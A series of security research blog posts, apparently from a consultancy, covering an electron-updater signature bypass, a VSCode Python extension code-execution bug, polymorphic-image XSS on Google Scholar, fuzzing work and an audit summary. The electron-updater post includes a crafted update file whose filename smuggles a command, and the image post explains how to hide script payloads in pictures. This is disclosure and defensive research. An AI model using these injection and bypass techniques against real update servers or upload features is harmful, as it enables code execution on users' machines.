The researcher also integrated AFL (American Fuzzy Lop) and started fuzzing our firmware. Our firmware depends on an external library, tinycbor, for parsing CBOR data. In about 24 hours of execution, the researcher exercised the code with over 100M inputs and found over 4k bogus inputs that are misinterpreted by tinycbor and cause a crash of our firmware. Interestingly, the initial inputs were generated by our FIDO2 testing framework.

The fuzzer will be integrated in our testing toolchain soon. If anyone in the community is interested in fuzzing and would like to contribute by fixing bugs in tinycbor we would be happy to share details and examples.

Summary

In summary, we engaged a security engineering company (Doyensec) to perform a security review of our firmware. You can read the full report for details on the process and the downgrade attack they found. For any additional question or for helping with fuzzing of tinycbor feel free to reach out on Twitter @SoloKeysSec or at [email protected].

We would like to thank Doyensec for their help in securing the SoloKeys platform. Please make sure to check their website, and oh, they’re also launching a game soon. Yes, a mobile game with a hacking theme!

Signature Validation Bypass Leading to RCE In Electron-Updater

We’ve been made aware that the vulnerability discussed in this blog post has been independently discovered and disclosed to the public by a well-known security researcher. Since the security issue is now public and it is over 90 days from our initial disclosure to the maintainer, we have decided to publish the details - even though the fix available in the latest version of Electron-Builder does not fully mitigate the security flaw.

Electron-Builder advertises itself as a “complete solution to package and build a ready for distribution Electron app with auto update support out of the box”. For macOS and Windows, code signing and verification are also supported. At the time of writing, the package counts around 100k weekly downloads, and it is being used by ~36k projects with over 8k stargazers.

Electron-Builder repository

This software is commonly used to build platform-specific packages for ElectronJs-based applications and it is frequently employed for software updates as well. The auto-update feature is provided by its electron-updater submodule, internally using Squirrel.Mac for macOS, NSIS for Windows and AppImage for Linux. In particular, it features a dual code-signing method for Windows (supporting SHA1 & SHA256 hashing algorithms).

A Fail Open Design

As part of a security engagement for one of our customers, we have reviewed the update mechanism performed by Electron Builder, and discovered an overall lack of secure coding practices. In particular, we identified a vulnerability that can be leveraged to bypass the signature verification check hence leading to remote command execution.

The signature verification check performed by electron-builder is simply based on a string comparison between the installed binary’s publisherName and the certificate’s Common Name attribute of the update binary. During a software update, the application will request a file named latest.yml from the update server, which contains the definition of the new release - including the binary filename and hashes.

To retrieve the update binary’s publisher, the module executes the following code leveraging the native Get-AuthenticodeSignature cmdlet from Microsoft.PowerShell.Security:

    execFile("powershell.exe", ["-NoProfile", "-NonInteractive", "-InputFormat", "None", "-Command", `Get-AuthenticodeSignature '${tempUpdateFile}' | ConvertTo-Json -Compress`], {
      timeout: 20 * 1000
    }, (error, stdout, stderr) => {
      try {
        if (error != null || stderr) {
          handleError(logger, error, stderr)
          resolve(null)
          return
        }

        const data = parseOut(stdout)
        if (data.Status === 0) {
          const name = parseDn(data.SignerCertificate.Subject).get("CN")!
          if (publisherNames.includes(name)) {
            resolve(null)
            return
          }
        }

        const result = `publisherNames: ${publisherNames.join(" | ")}, raw info: ` + JSON.stringify(data, (name, value) => name === "RawData" ? undefined : value, 2)
        logger.warn(`Sign verification failed, installer signed with incorrect certificate: ${result}`)
        resolve(result)
      }
      catch (e) {
        logger.warn(`Cannot execute Get-AuthenticodeSignature: ${error}. Ignoring signature validation due to unknown error.`)
        resolve(null)
        return
      }
    })

which translates to the following PowerShell command:

powershell.exe -NoProfile -NonInteractive -InputFormat None -Command "Get-AuthenticodeSignature 'C:\Users\<USER>\AppData\Roaming\<vulnerable app name>\__update__\<update name>.exe' | ConvertTo-Json -Compress"

Since the ${tempUpdateFile} variable is provided unescaped to the execFile utility, an attacker could bypass the entire signature verification by triggering a parse error in the script. This can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64).

For instance, a malicious update definition would look like:

version: 1.2.3
files:
  - url: v’ulnerable-app-setup-1.2.3.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 44653912
path: v'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

When serving a similar latest.yml to a vulnerable Electron app, the attacker-chosen setup executable will be run without warnings. Alternatively, they may leverage the lack of escaping to pull out a trivial command injection:

version: 1.2.3
files:
  - url: v';calc;'ulnerable-app-setup-1.2.3.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 44653912
path: v';calc;'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

From an attacker’s standpoint, it would be more practical to backdoor the installer and then leverage preexisting electron-updater features like isAdminRightsRequired to run the installer with Administrator privileges.

PoC Reproduction of the command injection by using Burp's interception feature

Impact

An attacker could leverage this fail open design to force a malicious update on Windows clients, effectively gaining code execution and persistence capabilities. This could be achieved in several scenarios, such as a service compromise of the update server, or an advanced MITM attack leveraging the lack of certificate validation/pinning against the update server.

Disclosure Timelines

Doyensec contacted the main project maintainer on November 12th, 2019 providing a full description of the vulnerability together with a Proof-of-Concept. After multiple solicitations, on January 7th, 2020 Doyensec received a reply acknowledging the bug but downplaying the risk.

At the same time (November 12th, 2019), we identified and reported this issue to a number of affected popular applications using the vulnerable electron-builder update mechanism on Windows, including:

On February 15th, 2020, we’ve been made aware that the vulnerability discussed in this blog post was discussed on Twitter. On February 24th, 2020, we’ve been informed by the package’s mantainer that the issue was resolved in release v22.3.5. While the patch is mitigating the potential command injection risk, the fail-open condition is still in place and we believe that other attack vectors exist. After informing all affected parties, we have decided to publish our technical blog post to emphasize the risk of using Electron-Builder for software updates.

Mitigations

Despite its popularity, we would suggest moving away from Electron-Builder due to the lack of secure coding practices and responsiveness of the maintainer.

Electron Forge represents a potential well-maintained substitute, which is taking advantage of the built-in Squirrel framework and Electron’s autoUpdater module. Since the Squirrel.Windows doesn’t implement signature validation either, for a robust signature validation on Windows consider shipping the app to the Windows Store or incorporate minisign into the update workflow.

Please note that using Electron-Builder to prepare platform-specific binaries does not make the application vulnerable to this issue as the vulnerability affects the electron-updater submodule only. Updates for Linux and Mac packages are also not affected.

If migrating to a different software update mechanism is not feasible, make sure to upgrade Electron-Builder to the latest version available. At the time of writing, we believe that other attack payloads for the same vulnerable code path still exists in Electron-Builder.

Standard security hardening and monitoring on the update server is important, as full access on such system is required in order to exploit the vulnerability. Finally, enforcing TLS certificate validation and pinning for connections to the update server mitigates the MITM attack scenario.

Credits

This issue was discovered and studied by Luca Carettoni and Lorenzo Stella. We would like to thank Samuel Attard of the ElectronJS Security WG for the review of this blog post.

2019 Gravitational Security Audit Results

This is a re-post of the original blogpost published by Gravitational on the 2019 security audit results for their two products: Teleport and Gravity.

You can download the security testing deliverables for Teleport and Gravity from our research page.

We would like to take this opportunity to thank the Gravitational engineering team for choosing Doyensec and working with us to ensure a successful project execution.

We now live in an era where the security of all layers of the software stack are immensely important, and simply open sourcing a code base is not enough to ensure that security vulnerabilities surface and are addressed. At Gravitational, we see it as a necessity to engage a third party that specializes in acting as an adversary, and provide an independent analysis of our sources.

2019 Gravitational Security Audit Results

This year, we had an opportunity to work with Doyensec, which provided the most thorough independent analysis of Gravity and Teleport to date. The Doyensec team did an amazing job at finding areas where we are weak in the Gravity code base. Here is the full report for Teleport and Gravity; and you can find all of our security audits here.

Gravity

Gravity has a lot of moving components. As a Kubernetes distribution and distributed system for delivering Kubernetes in many unique environments, the product’s attack surface isn’t small.

All flaws considered medium or higher except for one were patched and released as they were reported by the Doyensec team, and we’ve also been working towards addressing the more minor and informational issues as part of our normal release process. Out of the four vulnerabilities rated as high by Doyensec, we’ve managed to patch three of them, and the fourth relies on a significant investment in design and tooling change which we’ll go into in a moment.

Insecure Decompression of Application Bundles

Part of what Gravity does is package applications into an installer that can be taken to on-prem and air-gapped environments, installing a fully working Kubernetes cluster and application without dependencies. As such, we build our artifacts as a tar file - a virtually universally supported archive format.

Along with this, our own tooling is able to process and accept these tar archives, which is where we run into problems. Golang’s tar handling code is extremely basic and this allows very old tar handling problems to surface, granting specially crafted tar files the ability to overwrite arbitrary system files and allowing for remote code execution. Our tar handling has now been hardened against such vulnerabilities, and we’ll write a post digging into just this topic soon.

Remote Code Execution via Malicious Auth Connector

When using our cli tools to do single sign on, we launch a browser for the user to the single sign on page. This was done by passing a url from the server to the client to tell it where the SSO page is located.

Someone with access to the server is able to change the url to be a non http(s) url and execute programs locally on the cli host. We’ve implemented sanitization of the url passed by the server to enforce http(s), and also changed the design of some new features to not require trusting data from a server.

Missing ACLs in the API

Perhaps the most embarrassing issue in this list - the API endpoints responsible for managing API tokens were missing authorization ACLs. This allowed for any authenticated user, even those with empty permissions, to access, edit, and create tokens for other users. This would allow for user impersonation and privilege escalation. This vulnerability was quickly addressed by implementing the correct ACLs, and the team is working hard to ensure these types of vulnerabilities do not reoccur.

Missing Signature Verification in Application Bundles

This is the vulnerability we haven’t been able to address so far, as it was never a design objective to protect against this particular vulnerability.

Gravity includes a hub product for enterprise customers that allows for the storage and download of application assets, either for installation or upgrade. In essence, part of the hub product is to act as a file server where a company can store their application, and internally or publically connect deployed clusters for updates.

The weakness in the model, as has been seen by many public artifact repositories, is that this security model relies on the integrity of the system storing those assets.

While not necessarily a vulnerability on its own, this is a design weakness that doesn’t match the capabilities the security community expects. The security is roughly equivalent to posting a binary build to Github - anyone with the correct access can modify or post malicious assets, and anyone who trusts Github when downloading that asset could be getting a malicious asset. Instead, packages should be signed in some way before being posted to a public download server, and the software should have a method for trusting that updates and installs come from a trusted source.

This is a really difficult problem that many companies have gotten wrong, so it’s not something that Gravitational as an organization is willing to rush a solution for. There are several well known models that we are evaluating, but we’re not at a stage where we have a solution that we’re completely happy with.

In this realm, we’re also going to end-of-life the hub product as the asset storage functionality is not widely used. We’re also going move the remote access functionality that our customers do care about over to our Teleport product.

Teleport

As we mentioned in the Teleport 4.2 release notes, the most serious issues were centered around the incorrect handling of session data. If an attacker was able to gain valid x509 credentials of a Teleport node, they could use the session recording facility to read/write arbitrary files on the Auth Server or potentially corrupt recorded session data.

These vulnerabilities could be only exploited using credentials from a previously authenticated client. There was no known way to exploit this vulnerability outside the cluster by non-authenticated clients.

After the re-assessment, all issues with any direct security impact were addressed. From the report:

In January 2020, Doyensec performed a retesting of the Teleport platform and confirmed the effectiveness of the applied mitigations. All issues with direct security impact have been addressed by Gravitational.

Even though all direct issues were mitigated, there was one issue in the report that continued to bother us and we felt we could do better on: “#6: Session Recording Bypasses”. This is something we had known about for quite some time and something we have been upfront with to users and customers. Session recording is a great feature, however due to the inherent complexity of the problem being solved, bypasses do exist.

Teleport 4.2 introduced a new feature called Enhanced Session Recording that uses eBPF tooling to substantially reduce the bypass gaps that can exist. We’ll have more to share on that soon in the form of another blog post that will go into the technical implementation details for that feature.

Don't Clone That Repo: Visual Studio Code^2 Execution

This is the story of how I stumbled upon a code execution vulnerability in the Visual Studio Code Python extension. It currently has 16.5M+ installs reported in the extension marketplace.


The bug

Some time ago I was reviewing a client’s Python web application when I noticed a warning

VSCode pylint not installed warning

Fair enough, I thought, I just need to install pylint.

To my surprise, after running pip install --user pylint the warning was still there. Then I noticed venv-test displayed on the lower-left of the editor window. Did VSCode just automatically select the Python environment from the project folder?! To confirm my hypothesis, I installed pylint inside that virtualenv and the warning disappeared.

VSCode pylint not installed warning full window screenshot

This seemed sketchy, so I added os.exec("/Applications/Calculator.app") to one of pylint sources and a calculator spawned. Easiest code execution ever!

VSCode behaviour is dangerous since the virtualenv found in a project folder is activated without user interaction. Adding a malicious folder to the workspace and opening a python file inside the project is sufficient to trigger the vulnerability. Once a virtualenv is found, VSCode saves its path in .vscode/settings.json. If found in the cloned repo, this value is loaded and trusted without asking the user. In practice, it is possible to hide the virtualenv in any repository.

The behavior is not in VSCode core, but rather in the Python extension. We contacted Microsoft on the 2nd October 2019, however the vulnerability is still not patched at the time of writing. Given that the industry-standard 90 days expired and the issue is exposed in a GitHub issue, we have decided to disclose the vulnerability.

PoC || GTFO

You can try for yourself! This innocuous PoC repo opens Calculator.app on macOS:

  • 1) git clone [email protected]:doyensec/VSCode_PoC_Oct2019.git
  • 2) add the cloned repo to the VSCode workspace
  • 3) open test.py in VScode

This repo contains a “malicious” settings.json which selects the virtualenv in totally_innocuous_folder/no_seriously_nothing_to_see_here.

In case of a bare-bone repo like this noticing the virtualenv might be easy, but it’s clear to see how one might miss it in a real-life codebase. Moreover, it is certainly undesirable that VSCode executes code from a folder by just opening a Python file in the editor.

Disclosure Timeline

  • 2nd Oct 2019: Issue discovered
  • 2nd Oct 2019: Security advisory sent to Microsoft
  • 8th Oct 2019: Response from Microsoft, issue opened on vscode-python bug tracker #7805
  • 7th Jan 2020: Asked Microsoft for a resolution timeframe
  • 8th Jan 2020: Microsoft replies that the issue should be fixed by mid-April 2020
  • 16th Mar 2020: Doyensec advisory and blog post is published

Edits

  • 17th Mar 2020: The blogpost stated that the extension is bundled by default with the editor. That is not the case, and we removed that claim. Thanks @justinsteven for pointing this out!

InQL Scanner

InQL is now public!

As a part of our continuing security research journey, we started developing an internal tool to speed-up GraphQL security testing efforts. We’re excited to announce that InQL is available on Github.

Doyensec Loves GraphQL

InQL can be used as a stand-alone script, or as a Burp Suite extension (available for both Professional and Community editions). The tool leverages GraphQL built-in introspection query to dump queries, mutations, subscriptions, fields, arguments and retrieve default and custom objects. This information is collected and then processed to construct API endpoints documentation in the form of HTML and JSON schema. InQL is also able to generate query templates for all the known types. The scanner has the ability to identify basic query types and replace them with placeholders that will render the query ready to be ingested by a remote API endpoint.

We believe this feature, combined with the ability to send query templates to Burp’s Repeater, will decrease the time to exploit vulnerabilities in GraphQL endpoints and drastically lower the bar for security research against GraphQL tech stacks.

InQL Scanner Burp Suite Extension

Using the inql extension for Burp Suite, you can:

  • Search for known GraphQL URL paths; the tool will grep and match known values to detect GraphQL endpoints within the target website
  • Search for exposed GraphQL development consoles (GraphiQL, GraphQL Playground, and other common utilities)
  • Use a custom GraphQL tab displayed on each HTTP request/response containing GraphQL
  • Leverage the template generation by sending those requests to Burp’s Repeater tool
  • Configure the tool by using a custom settings tab

Enabling InQL Scanner Extension in Burp

To use inql in Burp Suite, import the Python extension:

  • Download the latest Jython Jar
  • Download the latest version of InQL scanner
  • Start Burp Suite
  • Extender Tab > Options > Python Enviroment > Set the location of Jython standalone JAR
  • Extender Tab > Extension > Add > Extension Type > Select Python
  • Extension File > Set the location of inql_burp.py > Next
  • The output window should display the following message: InQL Scanner Started!

In the next future, we might consider integrating the extension within Burp’s BApp Store.

InQL Demo

We completely revamped the command line interface in light of InQL’s public release. This interface retains most of the Burp plugin functionalities.

It is now possible to install the tool with pip and run it through your favorite CLI.

pip install inql

For all supported options, check the command line help:

usage: inql [-h] [-t TARGET] [-f SCHEMA_JSON_FILE] [-k KEY] [-p PROXY]
            [--header HEADERS HEADERS] [-d] [--generate-html]
            [--generate-schema] [--generate-queries] [--insecure]
            [-o OUTPUT_DIRECTORY]

InQL Scanner

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET             Remote GraphQL Endpoint (https://<Target_IP>/graphql)
  -f SCHEMA_JSON_FILE   Schema file in JSON format
  -k KEY                API Authentication Key
  -p PROXY              IP of web proxy to go through (http://127.0.0.1:8080)
  --header HEADERS HEADERS
  -d                    Replace known GraphQL arguments types with placeholder
                        values (useful for Burp Suite)
  --generate-html       Generate HTML Documentation
  --generate-schema     Generate JSON Schema Documentation
  --generate-queries    Generate Queries
  --insecure            Accept any SSL/TLS certificate
  -o OUTPUT_DIRECTORY   Output Directory

An example query can be performed on one of the numerous exposed APIs, e.g anilist.co endpoints:

$ $ inql -t https://anilist.co/graphql
[+] Writing Queries Templates
 |  Page
 |  Media
 |  MediaTrend
 |  AiringSchedule
 |  Character
 |  Staff
 |  MediaList
 |  MediaListCollection
 |  GenreCollection
 |  MediaTagCollection
 |  User
 |  Viewer
 |  Notification
 |  Studio
 |  Review
 |  Activity
 |  ActivityReply
 |  Following
 |  Follower
 |  Thread
 |  ThreadComment
 |  Recommendation
 |  Like
 |  Markdown
 |  AniChartUser
 |  SiteStatistics
[+] Writing Queries Templates
 |  UpdateUser
 |  SaveMediaListEntry
 |  UpdateMediaListEntries
 |  DeleteMediaListEntry
 |  DeleteCustomList
 |  SaveTextActivity
 |  SaveMessageActivity
 |  SaveListActivity
 |  DeleteActivity
 |  ToggleActivitySubscription
 |  SaveActivityReply
 |  DeleteActivityReply
 |  ToggleLike
 |  ToggleLikeV2
 |  ToggleFollow
 |  ToggleFavourite
 |  UpdateFavouriteOrder
 |  SaveReview
 |  DeleteReview
 |  RateReview
 |  SaveRecommendation
 |  SaveThread
 |  DeleteThread
 |  ToggleThreadSubscription
 |  SaveThreadComment
 |  DeleteThreadComment
 |  UpdateAniChartSettings
 |  UpdateAniChartHighlights
[+] Writing Queries Templates
[+] Writing Queries Templates

The resulting HTML documentation page will contain details for all available queries, mutations, and subscriptions.

Stay tuned!

Back in May 2018, we published a blog post on GraphQL security where we focused on vulnerabilities and misconfigurations. As part of that research effort, we developed a simple script to query GraphQL endpoints. After the publication, we received a lot of positive feedbacks that sparked even more interest in further developing the concept. Since then, we have refined our GraphQL testing methodologies and tooling. As part of our standard customer engagements, we often perform testing against GraphQL technologies, hence we expect to continue our research efforts in this space. Going forward, we will keep improving detection and make the tool more stable.

This project was made with love in the Doyensec Research island.

LibreSSL and OSS-Fuzz

The story of a fuzzing integration reward

In my first month at Doyensec I had the opportunity to bring together both my work and my spare time hobbies. I used the 25% research time offered by Doyensec to integrate the LibreSSL library into OSS-Fuzz. LibreSSL is an API compatible replacement for OpenSSL, and after the heartbleed attack, it is considered as a full-fledged replacement of OpenSSL on OpenBSD, macOS and VoidLinux.

OSS-Fuzz Fuzzying Process

Contextually to this research, we were awarded by Google a $10,000 bounty, 100% of which was donated to the Cancer Research Institute. The fuzzer also discovered 14+ new vulnerabilities and four of these were directly related to memory corruption.

In the following paragraphs we will walk through the process of porting a new project over to OSS-Fuzz from following the community provided steps all the way to the actual code porting and we will also show a vulnerability fixed in 136e6c997f476cc65e614e514ac3bf6ee54fc4b4.

commit 136e6c997f476cc65e614e514ac3bf6ee54fc4b4
Author: beck <>
Date:   Sat Mar 23 18:48:15 2019 +0000

    Add range checks to varios ASN1_INTEGER functions to ensure the
    sizes used remain a positive integer. Should address issue
    13799 from oss-fuzz
    ok tb@ jsing@

 src/lib/libcrypto/asn1/a_int.c    | 56 +++++++++++++++++++++++++++++++++++++++++++++++++++++---
 src/lib/libcrypto/asn1/tasn_prn.c |  8 ++++++--
 src/lib/libcrypto/bn/bn_lib.c     |  4 +++-
 3 files changed, 62 insertions(+), 6 deletions(-)

The FOSS historician blurry book

As a voidlinux maintainer, I’m a long time LibreSSL user and proponent. LibreSSL is a version of the TLS/crypto stack forked from OpenSSL in 2014 with the goals of modernizing the codebase, improving security, and applying best practice development procedures. The motivation for this kind of fork arose after the discovery of the Heartbleed vulnerability.

LibreSSL’s efforts are aimed at removing code considered useless for the target platforms, removing code smells and including additional secure defaults at the cost of compatibility. The LibreSSL codebase is now nearly 70% the size of OpenSSL (237558 cloc vs 335485 cloc), while implementing a similar API on all the major modern operating systems.

Forking is considered a Bad Thing not merely because it implies a lot of wasted effort in the future, but because forks tend to be accompanied by a great deal of strife and acrimony between the successor groups over issues of legitimacy, succession, and design direction. There is serious social pressure against forking. As a result, major forks (such as the Gnu-Emacs/XEmacs split, the fissioning of the 386BSD group into three daughter projects, and the short-lived GCC/EGCS split) are rare enough that they are remembered individually in hacker folklore.

Eric Raymond Homesteading the Noosphere

The LibreSSL effort was generally well received and it now replaces OpenSSL on OpenBSD, macOS since 10.11 and on many other Linux distributions. In the first few years 6 critical vulnerabilities were found in OpenSSL and none of them affected LibreSSL.

Historically, these kinds of forks tend to spawn competing projects which cannot later exchange code, splitting the potential pool of developers between them. However, the LibreSSL team has largely demonstrated of being able to merge and implement new OpenSSL code and bug fixes, all the while slimming down the original source code and cutting down on rarely used or dangerous features.

OSS-Fuzz Selection

While the development of LibreSSL appears to be a story with an happy ending, the integration of fuzzing and security auditing into the project was much less so. The Heartbleed vulnerability was like a wakeup call to the industry for tackling the security of libraries that make up the core of the internet. In particular, Google opened up OSS-Fuzz project. OSS-Fuzz is an effort to provide, for free, Google infrastructure to perform fuzzing against the most popular open source libraries. One of the first projects performing these tests was in fact Openssl.

OSS-Fuzz Fuzzying Process

Fuzz testing is a well-known technique for uncovering programming errors in software. Many of these detectable errors, like buffer overflows, can have serious security implications. OpenSSL included fuzzers in c38bb72797916f2a0ab9906aad29162ca8d53546 and was integrated into OSS-Fuzz later in 2016.

commit c38bb72797916f2a0ab9906aad29162ca8d53546
Refs: OpenSSL_1_1_0-pre5-217-gc38bb72797
Author:     Ben Laurie <[email protected]>
AuthorDate: Sat Mar 26 17:19:14 2016 +0000
Commit:     Ben Laurie <[email protected]>
CommitDate: Sat May 7 18:13:54 2016 +0100
    Add fuzzing!

Since both LibreSSL and OpenSSL share most of their codebase, with LibreSSL mainly implementing a secure subset of OpenSSL, we thought porting the OpenSSL fuzzers to LibreSSL would have been a fun and useful project. Moreover, this resulted in the discovery of several memory related corruption bugs.

To be noted, the following details won’t replace the official OSS-Fuzz guide but will instead help in selecting a good target project for OSS-Fuzz integration. Generally speaking applying for a new OSS-Fuzz integration proceeds in four logical steps:

  • Selection: Select a new project that isn’t yet ported. Check for existing projects in OSS-Fuzz projects directory. For example, check if somebody already tried to perform the same integration in a pull-request.
  • Feasibility: Check the feasibility and the security implications of that project on the Internet. As a general guideline, the more impact the project has on the everyday usage of the web the bigger the bounty will be. At the time of writing, OSS-Fuzz bounties are up to $20,000 with the Google patch-reward program. On the other hand, good coverage is expected to be developed for any integration. For this reason it is easier to integrate projects that already employ fuzzers.
  • Technical integration: Follow the super detailed getting started guide to perform an initial integration.
  • Profit: Apply for the Google patch-reward program. Profit?!

We were awarded a bounty, and we helped to protect the Internet just a little bit more. You should do it too!

Heartbreak

After a crash was found, OSS-Fuzz infrastructure provides a minimized test case which can be inspected by an analyst. The issue was found in the ASN1 parser. ASN1 is a formal notation used for describing data transmitted by telecommunications protocols, regardless of language implementation and physical representation of these data, whether complex or very simple. Coincidentally, it is employed for x.509 certificates, which represents the technical base for building public-key infrastructure.

Passing our testcase 0202 ff25 through dumpasn1 it’s possible to see how it errors out saying that the integer of length 2 (bytes) is encoded with a negative value. This is not allowed in ASN1, and it should not even be allowed in LibreSSL. However, as discovered by OSS-Fuzz, this test crashes the Libressl parser.

$ xxd ./test
xxd ../test
00000000: 0202 ff25                                ...%
$ dumpasn1 ./test
  0   2: INTEGER 65317
       :   Error: Integer is encoded as a negative value.

0 warnings, 1 error.

Since the LibreSSL implementation was not guarded against negative integers, trying to covert the ASN1 integer crafted a negative to an internal representation of BIGNUM and causes an uncontrolled over-read.

AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1==ERROR: AddressSanitizer: SEGV on unknown address 0x00009fff8000 (pc 0x00000058a308 bp 0x7ffd3e8b7bb0 sp 0x7ffd3e8b7b40 T0)
    ==1==The signal is caused by a READ memory access.
    SCARINESS: 20 (wild-addr-read)
        #0 0x58a307 in BN_bin2bn libressl/crypto/bn/bn_lib.c:601:19
        #1 0x6cd5ac in ASN1_INTEGER_to_BN libressl/crypto/asn1/a_int.c:456:13
        #2 0x6a39dd in i2s_ASN1_INTEGER libressl/crypto/x509v3/v3_utl.c:175:16
        #3 0x571827 in asn1_print_integer_ctx libressl/crypto/asn1/tasn_prn.c:457:6
        #4 0x571827 in asn1_primitive_print libressl/crypto/asn1/tasn_prn.c:556
        #5 0x571827 in asn1_item_print_ctx libressl/crypto/asn1/tasn_prn.c:239
        #6 0x57069a in ASN1_item_print libressl/crypto/asn1/tasn_prn.c:195:9
        #7 0x4f4db0 in FuzzerTestOneInput libressl.fuzzers/asn1.c:282:13
        #8 0x7fd3f5 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/libfuzzer/FuzzerLoop.cpp:529:15
        #9 0x7bd746 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/libfuzzer/FuzzerDriver.cpp:286:6
        #10 0x7c9273 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/libfuzzer/FuzzerDriver.cpp:715:9
        #11 0x7bcdbc in main /src/libfuzzer/FuzzerMain.cpp:19:10
        #12 0x7fa873b8282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/libc-start.c:291
        #13 0x41db18 in _start

This “wild” address read may be employed by malicious actors to perform leaks in security sensitive context. The Libressl maintainers team not only addressed the vulnerability promptly but also included an ulterior protection in order to guard against missing ASN1_PRIMITIVE_FUNCS in 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9.

commit 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9
Author: jsing <>
Date:   Mon Apr 1 15:48:04 2019 +0000

    Require all ASN1_PRIMITIVE_FUNCS functions to be provided.

    If an ASN.1 item provides its own ASN1_PRIMITIVE_FUNCS functions, require
    all functions to be provided (currently excluding prim_clear). This avoids
    situations such as having a custom allocator that returns a specific struct
    but then is then printed using the default primative print functions, which
    interpret the memory as a different struct.

Closing the door to strangers

Fuzzing, despite being seen as one of the easiest ways to discover security vulnerabilities, still works very well. Even if OSS-Fuzz is especially tailored to open source projects, it can also be adapted to closed source projects. In fact, at the cost of implementing the LLVMFuzzerOneInput interface, it integrates all the latest and greatest clang/llvm fuzzer technology. As Dockerfile language improves enormously on the devops side, we strongly believe that the OSS-Fuzz fuzzing interface definition language should be employed in every non-trivial closed source project too. If you need help, contact us for your security automation projects!

As always, this research was funded thanks to the 25% research time offered at Doyensec. Tune in again for new episodes!

Researching Polymorphic Images for XSS on Google Scholar

A few months ago I came across a curious design pattern on Google Scholar. Multiple screens of the web application were fetched and rendered using a combination of location.hash parameters and XHR to retrieve the supposed templating snippets from a relative URI, rendering them on the page unescaped.

Google Scholar's design pattern

This is not dangerous per se, unless the platform lets users upload arbitrary content and serve it from the same origin, which unfortunately Google Scholar does, given its image upload functionality.

While any penetration tester worth her salt would deem the exploitation of the issue trivial, Scholar’s image processing backend was applying different transformations to the uploaded images (i.e. stripping metadata and reprocessing the picture). When reporting the vulnerability, Google’s VRP team did not consider the upload of a polymorphic image carrying a valid XSS payload possible, and instead requested a PoC||GTFO.

Given the age of this technique, I first went through all past “well-known” techniques to generate polymorphic pictures, and then developed a test suite to investigate the behavior of some of the most popular libraries for image processing (i.e. Imagemagick, GraphicsMagick, Libvips). This effort led to the discovery of some interesting caveats. Some of these methods can also be used to conceal web shells or Javascript content to bypass “self” CSP directives.

Payload in EXIF

The easiest approach is to embed our payload in the metadata of the image. In the case of JPEG/JFIF, these pieces of metadata are stored in application-specific markers (called APPX), but they are not taken into account by the majority of image libraries. Exiftool is a popular tool to edit those entries, but you may find that in some cases the characters will get entity-escaped, so I resorted to inserting them manually. In the hope of Google’s Scholar preserving some whitelisted EXIFs, I created an image having 1.2k common EXIF tags, including CIPA standard and non-standard tags.

JPG having the plain XSS alert() payload in every common metadata field PNG having the plain XSS alert() payload in every common metadata field

While that didn’t work in my case, some of the EXIF entries are to this day kept in many popular web platforms. In most of the image libraries tested, PNG metadata is always kept when converting from PNG to PNG, while they are always lost from PNG to JPG.

Payload concatenated at the end of the image (after 0xFFD9 for JPGs or IEND for PNGs)

This technique will only work if no transformations are performed on the uploaded image, since only the image content is processed.

JPG having the plain XSS alert() payload after the trailing 0xFFD9 chunk PNG having the plain XSS alert() payload after the trailing IEND chunk

As the name suggests, the trick involves appending the JavaScript payload at the end of the image format.

Payload in PNG’s iDAT

In PNGs, the iDAT chunk stores the pixel information. Depending on the transformations applied, you may be able to directly insert your raw payload in the iDAT chunks or you may try to bypass the resize and re-sampling operations. Google’s Scholar only generated JPG pictures so I could not leverage this technique.

Payload in JPG’s ECS

In the JFIF standard, the entropy-coded data segment (ECS) contains the output of the raw Huffman-compressed bitstream which represents the Minimum Coded Unit (MCU) that comprises the image data. In theory, it is possible to position our payload in this segment, but there are no guarantees that our payload will survive the transformation applied by the image library on the server. Creating a JPG image resistant to the transformations caused by the library was a process of trial and error.

As a starting point I crafted a “base” image with the same quality factors as the images resulting from the conversion. For this I ended up using this image having 0-length-string EXIFs. Even though having the payload positioned at a variable offset from the beginning of the section did not work, I found that when processed by Google Scholar the first bytes of the image’s ECS section were kept if separated by a pattern of 0x00 and 0x14 bytes.

Hexadecimal view of the JFIF structure, with the payload visible in the ECS section

From here it took me a little time to find the right sequence of bytes allowing the payload to survive the transformation, since the majority of user agents were not tolerating low-value bytes in the script tag definition of the page. For anyone interested, we have made available the images embedding the onclick and mouseover events. Our image library test suite is available on Github as doyensec/StandardizedImageProcessingTest.

Exploitation result of the XSS PoC on Scholar

Timeline

  • [2019-09-28] Reported to Google VRP
  • [2019-09-30] Google’s VRP requested a PoC
  • [2019-10-04] Provided PoC #1
  • [2019-10-10] Google’s VRP requested a different payload for PoC
  • [2019-10-11] Provided PoC #2
  • [2019-11-05] Google’s VRP confirmed the issue in 2 endpoints, rewarded $6267.40
  • [2019-11-19] Google’s VRP found another XSS using the same technique, rewarded an additional $3133.70

Fuzzing TLS certificates from their ASN.1 grammar

A good part of my research time at Doyensec was devoted to building a flexible ASN.1 grammar-based fuzzer for testing TLS certificate parsers. I learned a lot in the process, but I often struggled to find good resources on these topics. In this blogpost I want to give a high-level overview of the problem, the approach I’m taking, and some pointers which might hopefully save a little time for other fellow security researchers.

Let’s start with some basics.

What is a TLS certificate?

